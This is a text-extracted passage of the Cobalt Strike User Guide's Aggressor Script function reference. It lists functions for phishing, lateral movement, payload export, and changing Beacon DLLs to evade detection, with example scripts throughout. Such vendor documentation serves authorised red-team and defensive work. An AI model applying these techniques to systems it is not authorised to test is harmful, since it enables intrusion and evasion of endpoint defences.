+listeners_local
+Returnalistoflistenernames.Thisfunctionlimitsitselftothecurrentteamserveronly.External
+C2listenernamesareomitted.
+Returns
+Anarrayoflistenernames.
+Example
+CobaltStrikeUserGuide www.fortra.com page:376
+
+AggressorScript/Functions
+printAll(listeners_local());
+listeners_stageless
+Returnalistoflistenernamesacrossallteamserversthisclientisconnectedto.ExternalC2
+listenersarefiltered(asthey'renotactionableviastagingorexportingasaReflectiveDLL).
+Returns
+Anarrayoflistenernames.
+Example
+printAll(listeners_stageless());
+localip
+GettheIPaddressassociatedwiththeteamserver.
+Returns
+Astringwiththeteamserver'sIPaddress.
+Example
+println("I am: " . localip());
+menubar
+Addatop-levelitemtothemenubar.
+Arguments
+$1-thedescription
+$2-thepopuphook
+Example
+CobaltStrikeUserGuide www.fortra.com page:377
+
+AggressorScript/Functions
+popup mythings {
+item "Keep out" {
+}
+}
+menubar("My &Things", "mythings");
+mynick
+GetthenicknameassociatedwiththecurrentCobaltStrikeclient.
+Returns
+Astringwithyournickname.
+Example
+println("I am: " . mynick());
+nextTab
+Activatethetabthatistotherightofthecurrenttab.
+Example
+bind Ctrl+Right {
+nextTab();
+}
+on
+Registeraneventhandler.Thisisanalternatetotheonkeyword.
+Arguments
+$1-thenameoftheeventtorespondto
+$2-acallbackfunction.Calledwhentheeventhappens.
+Example
+CobaltStrikeUserGuide www.fortra.com page:378
+
+AggressorScript/Functions
+sub foo {
+blog($1, "Foo!");
+}
+on("beacon_initial", &foo);
+openAboutDialog
+Openthe"AboutCobaltStrike"dialog
+Example
+openAboutDialog();
+openApplicationManager
+Opentheapplicationmanager(systemprofilerresults)tab.
+Example
+openApplicationManager();
+openAutoRunDialog
+Opentheautorundialog.
+Example
+openAutoRunDialog();
+openBeaconBrowser
+Openthebeaconbrowsertab.
+Example
+openBeaconBrowser();
+openBeaconConsole
+CobaltStrikeUserGuide www.fortra.com page:379
+
+AggressorScript/Functions
+OpentheconsoletointeractwithaBeacon
+Arguments
+$1-theBeaconIDtoapplythisfeatureto
+Example
+item "Interact" {
+local('$bid');
+foreach $bid ($1) {
+openBeaconConsole($bid);
+}
+}
+openBrowserPivotSetup
+openthebrowserpivotsetupdialog
+Arguments
+$1-theBeaconIDtoapplythisfeatureto
+Example
+item "Browser Pivoting" {
+local('$bid');
+foreach $bid ($1) {
+openBrowserPivotSetup($bid);
+}
+}
+openBypassUACDialog
+REMOVEDRemovedinCobaltStrike4.1.
+openCloneSiteDialog
+Openthedialogforthewebsiteclonetool.
+Example
+CobaltStrikeUserGuide www.fortra.com page:380
+
+AggressorScript/Functions
+openCloneSiteDialog();
+openConnectDialog
+Opentheconnectdialog.
+Example
+openConnectDialog();
+openCovertVPNSetup
+opentheCovertVPNsetupdialog
+Arguments
+$1-theBeaconIDtoapplythisfeatureto
+Example
+item "VPN Pivoting" {
+local('$bid');
+foreach $bid ($1) {
+openCovertVPNSetup($bid);
+}
+}
+openCredentialManager
+Openthecredentialmanagertab.
+Example
+openCredentialManager();
+openDefaultShortcutsDialog
+OpentheDefaultKeyboardShortcutsdialog.Thisfunctiondoesnothaveanyparameters.
+CobaltStrikeUserGuide www.fortra.com page:381
+
+AggressorScript/Functions
+openDownloadBrowser
+Openthedownloadbrowsertab
+Example
+openDownloadBrowser();
+openElevateDialog
+Openthedialogtolaunchaprivilegeescalationexploit.
+Arguments
+$1-thebeaconID
+Example
+item "Elevate" {
+local('$bid');
+foreach $bid ($1) {
+openElevateDialog($bid);
+}
+}
+openEventLog
+Opentheeventlog.
+Example
+openEventLog();
+openFileBrowser
+OpenthefilebrowserforaBeacon
+Arguments
+CobaltStrikeUserGuide www.fortra.com page:382
+
+AggressorScript/Functions
+$1-theBeaconIDtoapplythisfeatureto
+Example
+item "Browse Files" {
+local('$bid');
+foreach $bid ($1) {
+openFileBrowser($bid);
+}
+}
+openGoldenTicketDialog
+openadialogtohelpgenerateagoldenticket
+Arguments
+$1-theBeaconIDtoapplythisfeatureto
+Example
+item "Golden Ticket" {
+local('$bid');
+foreach $bid ($1) {
+openGoldenTicketDialog($bid);
+}
+}
+openHTMLApplicationDialog
+OpentheHTMLApplicationDialog.
+Example
+openHTMLApplicationDialog();
+openHostFileDialog
+Openthehostfiledialog.
+CobaltStrikeUserGuide www.fortra.com page:383
+
+AggressorScript/Functions
+Example
+openHostFileDialog();
+openInterfaceManager
+OpenthetabtomanageCovertVPNinterfaces
+Example
+openInterfaceManager();
+openJavaSignedAppletDialog
+OpentheJavaSignedAppletdialog
+Example
+openJavaSignedAppletDialog();
+openJavaSmartAppletDialog
+OpentheJavaSmartAppletdialog
+Example
+openJavaSmartAppletDialog();
+openJumpDialog
+OpenCobaltStrike'slateralmovementdialog
+Arguments
+$1-thetypeoflateralmovement.See&beacon_remote_exploitsforalistofoptions.sshand
+ssh-keyareoptionstoo.
+$2-anarrayoftargetstoapplythisactionagainst
+CobaltStrikeUserGuide www.fortra.com page:384
+
+AggressorScript/Functions
+Example
+openJumpDialog("psexec_psh", @("192.168.1.3", "192.168.1.4"));
+openKeystrokeBrowser
+Openthekeystrokebrowsertab
+Example
+openKeystrokeBrowser();
+openListenerManager
+Openthelistenermanager
+Example
+openListenerManager();
+openMakeTokenDialog
+openadialogtohelpgenerateanaccesstoken
+Arguments
+$1-theBeaconIDtoapplythisfeatureto
+Example
+item "Make Token" {
+local('$bid');
+foreach $bid ($1) {
+openMakeTokenDialog($bid);
+}
+}
+openMalleableProfileDialog
+CobaltStrikeUserGuide www.fortra.com page:385
+
+AggressorScript/Functions
+OpenthemalleableC2profiledialog.
+Example
+openMalleableProfileDialog();
+openOfficeMacro
+Opentheofficemacroexportdialog
+Example
+openOfficeMacroDialog();
+openOneLinerDialog
+OpenthedialogtogenerateaPowerShellone-linerforthisspecificBeaconsession.
+Arguments
+$1-thebeaconID
+Example
+item "&One-liner" {
+openOneLinerDialog($1);
+}
+openOrActivate
+IfaBeaconconsoleexists,makeitactive.IfaBeaconconsoledoesnotexist,openit.
+Arguments
+$1-theBeaconID
+Example
+CobaltStrikeUserGuide www.fortra.com page:386
+
+AggressorScript/Functions
+item "&Activate" {
+local('$bid');
+foreach $bid ($1) {
+openOrActivate($bid);
+}
+}
+openPayloadGeneratorDialog
+OpenthePayloadGeneratordialog.
+Example
+openPayloadGeneratorDialog();
+openPayloadHelper
+Openapayloadchooserdialog.
+Arguments
+$1-acallbackfunction.Arguments:$1-theselectedlistener.
+Example
+openPayloadHelper(lambda({
+bspawn($bid, $1);
+}, $bid => $1));
+openPivotListenerSetup
+openthepivotlistenersetupdialog
+Arguments
+$1-theBeaconIDtoapplythisfeatureto
+Example
+item "Listener..." {
+local('$bid');
+CobaltStrikeUserGuide www.fortra.com page:387
+
+AggressorScript/Functions
+foreach $bid ($1) {
+openPivotListenerSetup($bid);
+}
+}
+openPortScanner
+Opentheportscannerdialog
+Arguments
+$1-anarrayoftargetstoscan
+Example
+openPortScanner(@("192.168.1.3"));
+openPortScannerLocal
+OpentheportscannerdialogwithoptionstotargetaBeacon'slocalnetwork
+Arguments
+$1-thebeacontotargetwiththisfeature
+Example
+item "Scan" {
+local('$bid');
+foreach $bid ($1) {
+openPortScannerLocal($bid);
+}
+}
+openPowerShellWebDialog
+OpenthedialogtosetupthePowerShellWebDeliveryAttack
+Example
+openPowerShellWebDialog();
+CobaltStrikeUserGuide www.fortra.com page:388
+
+AggressorScript/Functions
+openPreferencesDialog
+Openthepreferencesdialog
+Example
+openPreferencesDialog();
+openProcessBrowser
+OpenaprocessbrowserforoneormoreBeacons
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+Example
+item "Processes" {
+openProcessBrowser($1);
+}
+openSOCKSBrowser
+OpenthetabtolistSOCKSproxyservers
+Example
+openSOCKSBrowser();
+openSOCKSSetup
+opentheSOCKSproxyserversetupdialog
+Arguments
+$1-theBeaconIDtoapplythisfeatureto
+Example
+CobaltStrikeUserGuide www.fortra.com page:389
+
+AggressorScript/Functions
+item "SOCKS Server" {
+local('$bid');
+foreach $bid ($1) {
+openSOCKSSetup($bid);
+}
+}
+openScreenshotBrowser
+Openthescreenshotbrowsertab
+Example
+openScreenshotBrowser();
+openScriptConsole
+OpentheAggressorScriptconsole.
+Example
+openScriptConsole();
+openScriptManager
+Openthetabforthescriptmanager.
+Example
+openScriptManager();
+openScriptedWebDialog
+OpenthedialogtosetupaScriptedWebDeliveryAttack
+Example
+openScriptedWebDialog();
+CobaltStrikeUserGuide www.fortra.com page:390
+
+AggressorScript/Functions
+openServiceBrowser
+Openservicebrowserdialog
+Arguments
+$1-anarrayoftargetstoshowservicesfor
+Example
+openServiceBrowser(@("192.168.1.3"));
+openSiteManager
+Openthesitemanager.
+Example
+openSiteManager();
+openSpawnAsDialog
+Opendialogtospawnapayloadasanotheruser
+Arguments
+$1-theBeaconIDtoapplythisfeatureto
+Example
+item "Spawn As..." {
+local('$bid');
+foreach $bid ($1) {
+openSpawnAsDialog($bid);
+}
+}
+openSpearPhishDialog
+CobaltStrikeUserGuide www.fortra.com page:391
+
+AggressorScript/Functions
+Openthedialogforthespearphishingtool.
+Example
+openSpearPhishDialog();
+openSystemInformationDialog
+Openthesysteminformationdialog.
+Example
+openSystemInformationDialog();
+openSystemProfilerDialog
+Openthedialogtosetupthesystemprofiler.
+Example
+openSystemProfilerDialog();
+openTargetBrowser
+Openthetargetsbrowser
+Example
+openTargetBrowser();
+openWebLog
+Opentheweblogtab.
+Example
+openWebLog();
+CobaltStrikeUserGuide www.fortra.com page:392
+
+AggressorScript/Functions
+openWindowsDropperDialog
+REMOVED Removed in Cobalt Strike 4.0.
+openWindowsExecutableDialog
+OpenthedialogtogenerateaWindowsexecutable.
+Example
+openWindowsExecutableDialog();
+openWindowsExecutableStage
+OpenthedialogtogenerateastagelessWindowsexecutable.
+Example
+openWindowsExecutableStage();
+openWindowsExecutableStageAllDialog
+Openthedialogtogenerateallofthestagelesspayloads(inx86andx64)forallofthe
+configuredlisteners.ThisdialogcanalsobefoundintheUImenuunderPayloads -> Windows
+Stageless Generate all Payloads.
+Example
+openWindowsExecutableStageAllDialog();
+payload
+ExportsarawpayloadforaspecificCobaltStrikelistener.
+Arguments
+$1-thelistenername
+$2-x86|x64thearchitectureofthepayload
+CobaltStrikeUserGuide www.fortra.com page:393
+
+AggressorScript/Functions
+$3-exitmethod:'thread'(leavethethreadwhendone)or'process'(exittheprocesswhen
+done).Use'thread'ifinjectingintoanexistingprocess.
+$4-Astringvalueforthesystemcallmethod.Validvaluesare:
+None:UsethestandardWindowsAPIfunction.
+Direct:UsetheNt*versionofthefunction.
+Indirect:JumptotheappropriateinstructionwithintheNt*versionofthefunction.
+$5-(optional)ThesupportingHTTPlibraryforgeneratedbeacons(wininet|winhttp|$null|blank
+string).
+Returns
+Ascalarcontainingposition-independentcodeforthespecifiedlistener.
+Example
+$data = payload("my listener", "x86", "process", "Direct");
+$handle = openf(">out.bin");
+writeb($handle, $data);
+closef($handle);
+payload_bootstrap_hint
+GettheoffsettofunctionpointerhintsusedbyBeacon'sReflectiveLoader.Populatethesehints
+withtheasked-forprocessaddressestohaveBeaconloaditselfintomemoryinamoreOPSEC-
+safeway.
+Arguments
+$1-thepayloadposition-independentcode(specifically,Beacon)
+$2-thefunctiontogetthepatchlocationfor
+Notes
+CobaltStrikeUserGuide www.fortra.com page:394
+
+AggressorScript/Functions
+l CobaltStrike'sBeaconhasaprotocoltoacceptartifact-providedfunctionpointersfor
+functionsrequiredbyBeacon'sReflectiveLoader.Theprotocolistopatchthelocationof
+GetProcAddressandGetModuleHandleAintotheBeaconDLL.Useofthisprotocol
+allowsBeacontoloaditselfinmemorywithouttriggeringshellcodedetectionheuristics
+thatmonitorreadsofkernel32'sExportAddressTable.Thisprotocolisoptional.
+Artifactsthatdon'tfollowthisprotocolwillfallbacktoresolvingkeyfunctionsviathe
+ExportAddressTable.
+l TheArtifactKitandResourceKitbothimplementthisprotocol.Downloadthesekitsto
+seehowtousethisfunction.
+Returns
+TheoffsettoamemorylocationtopatchwithapointerforaspecificfunctionusedbyBeacon's
+ReflectiveLoader.
+payload_local
+ExportsarawpayloadforaspecificCobaltStrikelistener.Usethisfunctionwhenyouplanto
+spawnthispayloadfromanotherBeaconsession.CobaltStrikewillgenerateapayloadthat
+embedskeyfunctionpointers,neededtobootstraptheagent,takenfromtheparentsession's
+metadata.
+Arguments
+$1-theparentBeaconsessionID
+$2-thelistenername
+$3-x86|x64thearchitectureofthepayload
+$4-exitmethod:'thread'(leavethethreadwhendone)or'process'(exittheprocesswhen
+done).Use'thread'ifinjectingintoanexistingprocess.
+$5-Astringvalueforthesystemcallmethod.Validvaluesare:
+None:UsethestandardWindowsAPIfunction.
+Direct:UsetheNt*versionofthefunction.
+Indirect:JumptotheappropriateinstructionwithintheNt*versionofthefunction.
+$6-(optional)ThesupportingHTTPlibraryforgeneratedbeacons(wininet|winhttp|$null|blank
+string).
+CobaltStrikeUserGuide www.fortra.com page:395
+
+AggressorScript/Functions
+Returns
+Ascalarcontainingposition-independentcodeforthespecifiedlistener.
+Example
+$data = payload_local($bid, "my listener", "x86", "process", "None");
+$handle = openf(">out.bin");
+writeb($handle, $data);
+closef($handle);
+pe_insert_rich_header
+InsertrichheaderdataintoBeaconDLLContent.Ifthereisexistingrichheaderinformation,it
+willbereplaced.
+Arguments
+$1-BeaconDLLcontent
+$2-Richheader
+Returns
+UpdatedDLLContent
+Note
+Therichheaderlengthshouldbeona4byteboundaryforsubsequentchecksumcalculations.
+Example
+# -------------------------------------
+# Insert (replace) rich header
+# -------------------------------------
+$rich_header = "";
+$temp_dll = pe_insert_rich_header($temp_dll, $rich_header);
+pe_mask
+CobaltStrikeUserGuide www.fortra.com page:396
+
+AggressorScript/Functions
+MaskdataintheBeaconDLLContentbasedonpositionandlength.
+Arguments
+$1-BeaconDLLcontent
+$2-Startlocation
+$3-Lengthtomask
+$4-Bytevaluemaskkey(int)
+Returns
+UpdatedDLLContent
+Example
+# ===========================================================================
+# $1 = Beacon DLL content
+# ===========================================================================
+sub demo_pe_mask {
+local('$temp_dll, $start, $length, $maskkey');
+local('%pemap');
+local('@loc_en, @val_en');
+$temp_dll = $1;
+# -------------------------------------
+# Inspect the current DLL...
+# -------------------------------------
+%pemap = pedump($temp_dll);
+@loc_en = values(%pemap, @("Export.Name."));
+@val_en = values(%pemap, @("Export.Name."));
+if (size(@val_en) != 1) {
+warn("Unexpected size of export name value array: " . size(@val_en));
+} else {
+warn("Current export value: " . @val_en[0]);
+}
+if (size(@loc_en) != 1) {
+warn("Unexpected size of export location array: " . size(@loc_en));
+} else {
+CobaltStrikeUserGuide www.fortra.com page:397
+
+AggressorScript/Functions
+warn("Current export name location: " . @loc_en[0]);
+}
+# -------------------------------------
+# Set parameters (parse number as base 10)
+# -------------------------------------
+$start = parseNumber(@loc_en[0], 10);
+$length = 4;
+$maskkey = 22;
+# -------------------------------------
+# mask some data in a dll
+# -------------------------------------
+# warn("pe_mask(dll, " . $start . ", " . $length . ", " . $maskkey . ")");
+$temp_dll = pe_mask($temp_dll, $start, $length, $maskkey);
+# dump_my_pe($temp_dll);
+# -------------------------------------
+# un-mask (running the same mask a second time should "un-mask")
+# (This would normally be done by the reflective loader)
+# -------------------------------------
+# warn("pe_mask(dll, " . $start . ", " . $length . ", " . $maskkey . ")");
+# $temp_dll = pe_mask($temp_dll, $start, $length, $maskkey);
+# dump_my_pe($temp_dll);
+# -------------------------------------
+# All Done! Give back edited DLL!
+# -------------------------------------
+return $temp_dll;
+}
+pe_mask_section
+MaskdataintheBeaconDLLContentbasedonpositionandlength.
+Arguments
+$1-BeaconDLLcontent
+$2-Sectionname
+$3-Bytevaluemaskkey(int)
+Returns
+CobaltStrikeUserGuide www.fortra.com page:398
+
+AggressorScript/Functions
+UpdatedDLLContent
+Example
+# ===========================================================================
+# $1 = Beacon DLL content
+# ===========================================================================
+sub demo_pe_mask_section {
+local('$temp_dll, $section_name, $maskkey');
+local('@loc_en, @val_en');
+$temp_dll = $1;
+# -------------------------------------
+# Set parameters
+# -------------------------------------
+$section_name = ".text";
+$maskkey = 23;
+# -------------------------------------
+# mask a section in a dll
+# -------------------------------------
+# warn("pe_mask_section(dll, " . $section_name . ", " . $maskkey . ")");
+$temp_dll = pe_mask_section($temp_dll, $section_name, $maskkey);
+# dump_my_pe($temp_dll);
+# -------------------------------------
+# un-mask (running the same mask a second time should "un-mask")
+# (This would normally be done by the reflective loader)
+# -------------------------------------
+# warn("pe_mask_section(dll, " . $section_name . ", " . $maskkey . ")");
+# $temp_dll = pe_mask_section($temp_dll, $section_name, $maskkey);
+# dump_my_pe($temp_dll);
+# -------------------------------------
+# All Done! Give back edited DLL!
+# -------------------------------------
+return $temp_dll;
+}
+pe_mask_string
+CobaltStrikeUserGuide www.fortra.com page:399
+
+AggressorScript/Functions
+MaskastringintheBeaconDLLContentbasedonposition.
+Arguments
+$1-BeaconDLLcontent
+$2-Startlocation
+$3-Bytevaluemaskkey(int)
+Returns
+UpdatedDLLContent
+Example
+# ===========================================================================
+# $1 = Beacon DLL content
+# ===========================================================================
+sub demo_pe_mask_string {
+local('$temp_dll, $location, $length, $maskkey');
+local('%pemap');
+local('@loc);
+$temp_dll = $1;
+# -------------------------------------
+# Inspect the current DLL...
+# -------------------------------------
+%pemap = pedump($temp_dll);
+@loc = values(%pemap, @("Sections.AddressOfName.0."));
+if (size(@loc) != 1) {
+warn("Unexpected size of section name location array: " . size(@loc));
+} else {
+warn("Current section name location: " . @loc[0]);
+}
+# -------------------------------------
+# Set parameters
+# -------------------------------------
+$location = @loc[0];
+$length = 5;
+$maskkey = 23;
+CobaltStrikeUserGuide www.fortra.com page:400
+
+AggressorScript/Functions
+# -------------------------------------
+# pe_mask_string (mask a string in a dll)
+# -------------------------------------
+# warn("pe_mask_string(dll, " . $location . ", " . $maskkey . ")");
+$temp_dll = pe_mask_string($temp_dll, $location, $maskkey);
+# dump_my_pe($temp_dll);
+# -------------------------------------
+# un-mask (running the same mask a second time should "un-mask")
+# we are unmasking the length of the string and the null character
+# (This would normally be done by the reflective loader)
+# -------------------------------------
+# warn("pe_mask(dll, " . $location . ", " . $length . ", " . $maskkey .
+")");
+# $temp_dll = pe_mask($temp_dll, $location, $length, $maskkey);
+# dump_my_pe($temp_dll);
+# -------------------------------------
+# All Done! Give back edited DLL!
+# -------------------------------------
+return $temp_dll;
+}
+pe_patch_code
+PatchcodeintheBeaconDLLContentbasedonfind/replacein'.text'section'.
+Arguments
+$1-BeaconDLLcontent
+$2-bytearraytofindforresolveoffset
+$3-bytearrayplaceatresolvedoffset(overwritedata)
+Returns
+UpdatedDLLContent
+Example
+CobaltStrikeUserGuide www.fortra.com page:401
+
+AggressorScript/Functions
+# ===========================================================================
+# $1 = Beacon DLL content
+# ===========================================================================
+sub demo_pe_patch_code {
+local('$temp_dll, $findme, $replacement');
+$temp_dll = $1;
+# ====== simple text values ======
+$findme = "abcABC123";
+$replacement = "123ABCabc";
+# warn("pe_patch_code(dll, " . $findme . ", " . $replacement . ")");
+$temp_dll = pe_patch_code($temp_dll, $findme, $replacement);
+# ====== byte array as a hex string ======
+$findme = "\x01\x02\x03\xfc\xfe\xff";
+$replacement = "\x01\x02\x03\xfc\xfe\xff";
+# warn("pe_patch_code(dll, " . $findme . ", " . $replacement . ")");
+$temp_dll = pe_patch_code($temp_dll, $findme, $replacement);
+# dump_my_pe($temp_dll);
+# -------------------------------------
+# All Done! Give back edited DLL!
+# -------------------------------------
+return $temp_dll;
+}
+pe_remove_rich_header
+RemovetherichheaderfromBeaconDLLContent.
+Arguments
+$1-BeaconDLLcontent
+Returns
+UpdatedDLLContent
+Example
+CobaltStrikeUserGuide www.fortra.com page:402
+
+AggressorScript/Functions
+# -------------------------------------
+# Remove/Replace Rich Header
+# -------------------------------------
+$temp_dll = pe_remove_rich_header($temp_dll);
+pe_set_compile_time_with_long
+SetthecompiletimeintheBeaconDLLContent.
+Arguments
+$1-BeaconDLLcontent
+$2-CompileTime(asalonginmilliseconds)
+Returns
+UpdatedDLLContent
+Example
+# date is in milliseconds ("1893521594000" = "01 Jan 2030 12:13:14")
+$date = 1893521594000;
+$temp_dll = pe_set_compile_time_with_long($temp_dll, $date);
+# date is in milliseconds ("1700000001000" = "14 Nov 2023 16:13:21")
+$date = 1700000001000;
+$temp_dll = pe_set_compile_time_with_long($temp_dll, $date);
+pe_set_compile_time_with_string
+SetthecompiletimeintheBeaconDLLContent.
+Arguments
+$1-BeaconDLLcontent
+$2-CompileTime(asastring)
+Returns
+UpdatedDLLContent
+CobaltStrikeUserGuide www.fortra.com page:403
+
+AggressorScript/Functions
+Example
+# ("01 Jan 2020 15:16:17" = "1577913377000")
+$strTime = "01 Jan 2020 15:16:17";
+$temp_dll = pe_set_compile_time_with_string($temp_dll, $strTime);
+pe_set_export_name
+SettheexportnameintheBeaconDLLContent.
+Arguments
+$1-BeaconDLLcontent
+Returns
+UpdatedDLLContent
+Note
+Thenamemustexistinthestringtable.
+Example
+# -------------------------------------
+# name must be in strings table...
+# -------------------------------------
+$export_name = "WININET.dll";
+$temp_dll = pe_set_export_name($temp_dll, $export_name);
+$export_name = "beacon.dll";
+$temp_dll = pe_set_export_name($temp_dll, $export_name);
+pe_set_long
+Placesalongvalueataspecifiedlocation.
+Arguments
+$1-BeaconDLLcontent
+CobaltStrikeUserGuide www.fortra.com page:404
+
+AggressorScript/Functions
+$2-Location
+$3-Value
+Returns
+UpdatedDLLContent
+Example
+# ===========================================================================
+# $1 = Beacon DLL content
+# ===========================================================================
+sub demo_pe_set_long {
+local('$temp_dll, $int_offset, $long_value');
+local('%pemap');
+local('@loc_cs, @val_cs');
+$temp_dll = $1;
+# -------------------------------------
+# Inspect the current DLL...
+# -------------------------------------
+%pemap = pedump($temp_dll);
+@loc_cs = values(%pemap, @("CheckSum."));
+@val_cs = values(%pemap, @("CheckSum."));
+if (size(@val_cs) != 1) {
+warn("Unexpected size of checksum value array: " . size(@val_cs));
+} else {
+warn("Current checksum value: " . @val_cs[0]);
+}
+if (size(@loc_cs) != 1) {
+warn("Unexpected size of checksum location array: " . size(@loc_cs));
+} else {
+warn("Current checksum location: " . @loc_cs[0]);
+}
+# -------------------------------------
+# Set parameters (parse number as base 10)
+# -------------------------------------
+$int_offset = parseNumber(@loc_cs[0], 10);
+$long_value = 98765;
+CobaltStrikeUserGuide www.fortra.com page:405
+
+AggressorScript/Functions
+# -------------------------------------
+# pe_set_long (set a long value)
+# -------------------------------------
+# warn("pe_set_long(dll, " . $int_offset . ", " . $long_value . ")");
+$temp_dll = pe_set_long($temp_dll, $int_offset, $long_value);
+# -------------------------------------
+# Did it work?
+# -------------------------------------
+# dump_my_pe($temp_dll);
+# -------------------------------------
+# All Done! Give back edited DLL!
+# -------------------------------------
+return $temp_dll;
+}
+pe_set_short
+Placesashortvalueataspecifiedlocation.
+Arguments
+$1-BeaconDLLcontent
+$2-Location
+$3-Value
+Returns
+UpdatedDLLContent
+Example
+# ===========================================================================
+# $1 = Beacon DLL content
+# ===========================================================================
+sub demo_pe_set_short {
+local('$temp_dll, $int_offset, $short_value');
+local('%pemap');
+local('@loc, @val');
+CobaltStrikeUserGuide www.fortra.com page:406
+
+AggressorScript/Functions
+$temp_dll = $1;
+# -------------------------------------
+# Inspect the current DLL...
+# -------------------------------------
+%pemap = pedump($temp_dll);
+@loc = values(%pemap, @(".text.NumberOfRelocations."));
+@val = values(%pemap, @(".text.NumberOfRelocations."));
+if (size(@val) != 1) {
+warn("Unexpected size of .text.NumberOfRelocations value array: " . size(@val));
+} else {
+warn("Current .text.NumberOfRelocations value: " . @val[0]);
+}
+if (size(@loc) != 1) {
+warn("Unexpected size of .text.NumberOfRelocations location array: " . size
+(@loc));
+} else {
+warn("Current .text.NumberOfRelocations location: " . @loc[0]);
+}
+# -------------------------------------
+# Set parameters (parse number as base 10)
+# -------------------------------------
+$int_offset = parseNumber(@loc[0], 10);
+$short_value = 128;
+# -------------------------------------
+# pe_set_short (set a short value)
+# -------------------------------------
+# warn("pe_set_short(dll, " . $int_offset . ", " . $short_value . ")");
+$temp_dll = pe_set_short($temp_dll, $int_offset, $short_value);
+# -------------------------------------
+# Did it work?
+# -------------------------------------
+# dump_my_pe($temp_dll);
+# -------------------------------------
+# All Done! Give back edited DLL!
+# -------------------------------------
+return $temp_dll;
+}
+pe_set_string
+CobaltStrikeUserGuide www.fortra.com page:407
+
+AggressorScript/Functions
+Placesastringvalueataspecifiedlocation.
+Arguments
+$1-BeaconDLLcontent
+$2-Startlocation
+$3-Value
+Returns
+UpdatedDLLContent
+Example
+# ===========================================================================
+# $1 = Beacon DLL content
+# ===========================================================================
+sub demo_pe_set_string {
+local('$temp_dll, $location, $value');
+local('%pemap');
+local('@loc_en, @val_en');
+$temp_dll = $1;
+# -------------------------------------
+# Inspect the current DLL...
+# -------------------------------------
+%pemap = pedump($temp_dll);
+@loc_en = values(%pemap, @("Export.Name."));
+@val_en = values(%pemap, @("Export.Name."));
+if (size(@val_en) != 1) {
+warn("Unexpected size of export name value array: " . size(@val_en));
+} else {
+warn("Current export value: " . @val_en[0]);
+}
+if (size(@loc_en) != 1) {
+warn("Unexpected size of export location array: " . size(@loc_en));
+} else {
+warn("Current export name location: " . @loc_en[0]);
+}
+CobaltStrikeUserGuide www.fortra.com page:408
+
+AggressorScript/Functions
+# -------------------------------------
+# Set parameters (parse number as base 10)
+# -------------------------------------
+$location = parseNumber(@loc_en[0], 10);
+$value = "BEECON.DLL";
+# -------------------------------------
+# pe_set_string (set a string value)
+# -------------------------------------
+# warn("pe_set_string(dll, " . $location . ", " . $value . ")");
+$temp_dll = pe_set_string($temp_dll, $location, $value);
+# -------------------------------------
+# Did it work?
+# -------------------------------------
+# dump_my_pe($temp_dll);
+# -------------------------------------
+# All Done! Give back edited DLL!
+# -------------------------------------
+return $temp_dll;
+}
+pe_set_stringz
+Placesastringvalueataspecifiedlocationandaddsazeroterminator.
+Arguments
+$1-BeaconDLLcontent
+$2-Startlocation
+$3-Stringtoset
+Returns
+UpdatedDLLContent
+Example
+# ===========================================================================
+# $1 = Beacon DLL content
+CobaltStrikeUserGuide www.fortra.com page:409
+
+AggressorScript/Functions
+# ===========================================================================
+sub demo_pe_set_stringz {
+local('$temp_dll, $offset, $value');
+local('%pemap');
+local('@loc');
+$temp_dll = $1;
+# -------------------------------------
+# Inspect the current DLL...
+# -------------------------------------
+%pemap = pedump($temp_dll);
+@loc = values(%pemap, @("Sections.AddressOfName.0."));
+if (size(@loc) != 1) {
+warn("Unexpected size of section name location array: " . size(@loc));
+} else {
+warn("Current section name location: " . @loc[0]);
+}
+# -------------------------------------
+# Set parameters (parse number as base 10)
+# -------------------------------------
+$offset = parseNumber(@loc[0], 10);
+$value = "abc";
+# -------------------------------------
+# pe_set_stringz
+# -------------------------------------
+# warn("pe_set_stringz(dll, " . $offset . ", " . $value . ")");
+$temp_dll = pe_set_stringz($temp_dll, $offset, $value);
+# -------------------------------------
+# Did it work?
+# -------------------------------------
+# dump_my_pe($temp_dll);
+# -------------------------------------
+# Set parameters
+# -------------------------------------
+# $offset = parseNumber(@loc[0], 10);
+# $value = ".tex";
+# -------------------------------------
+# pe_set_string (set a string value)
+# -------------------------------------
+# warn("pe_set_string(dll, " . $offset . ", " . $value . ")");
+CobaltStrikeUserGuide www.fortra.com page:410
+
+AggressorScript/Functions
+# $temp_dll = pe_set_string($temp_dll, $offset, $value);
+# -------------------------------------
+# Did it work?
+# -------------------------------------
+# dump_my_pe($temp_dll);
+# -------------------------------------
+# All Done! Give back edited DLL!
+# -------------------------------------
+return $temp_dll;
+}
+pe_set_value_at
+SetsalongvaluebasedonthelocationresolvedbyanamefromthePEMap(seepedump).
+Arguments
+$1-BeaconDLLcontent
+$2-Nameoflocationfield
+$3-Value
+Returns
+UpdatedDLLContent
+Example
+# ===========================================================================
+# $1 = DLL content
+# ===========================================================================
+sub demo_pe_set_value_at {
+local('$temp_dll, $name, $long_value, $date');
+local('%pemap');
+local('@loc, @val');
+$temp_dll = $1;
+# -------------------------------------
+# Inspect the current DLL...
+CobaltStrikeUserGuide www.fortra.com page:411
+
+AggressorScript/Functions
+# -------------------------------------
+# %pemap = pedump($temp_dll);
+# @loc = values(%pemap, @("SizeOfImage."));
+# @val = values(%pemap, @("SizeOfImage."));
+# if (size(@val) != 1) {
+# warn("Unexpected size of SizeOfImage. value array: " . size(@val));
+# } else {
+# warn("Current SizeOfImage. value: " . @val[0]);
+# }
+# if (size(@loc) != 1) {
+# warn("Unexpected size of SizeOfImage location array: " . size(@loc));
+# } else {
+# warn("Current SizeOfImage. location: " . @loc[0]);
+# }
+# -------------------------------------
+# Set parameters
+# -------------------------------------
+$name = "SizeOfImage";
+$long_value = 22334455;
+# -------------------------------------
+# pe_set_value_at (set a long value at the location resolved by name)
+# -------------------------------------
+# $1 = DLL (byte array)
+# $2 = name (string)
+# $3 = value (long)
+# -------------------------------------
+warn("pe_set_value_at(dll, " . $name . ", " . $long_value . ")");
+$temp_dll = pe_set_value_at($temp_dll, $name, $long_value);
+# -------------------------------------
+# Did it work?
+# -------------------------------------
+# dump_my_pe($temp_dll);
+# -------------------------------------
+# set it back?
+# -------------------------------------
+# warn("pe_set_value_at(dll, " . $name . ", " . @val[0] . ")");
+# $temp_dll = pe_set_value_at($temp_dll, $name, @val[0]);
+# dump_my_pe($temp_dll);
+# -------------------------------------
+# All Done! Give back edited DLL!
+CobaltStrikeUserGuide www.fortra.com page:412
+
+AggressorScript/Functions
+# -------------------------------------
+return $temp_dll;
+}
+pe_stomp
+Setastringtonullcharacters.Startataspecifiedlocationandsetsallcharacterstonulluntila
+nullstringterminatorisreached.
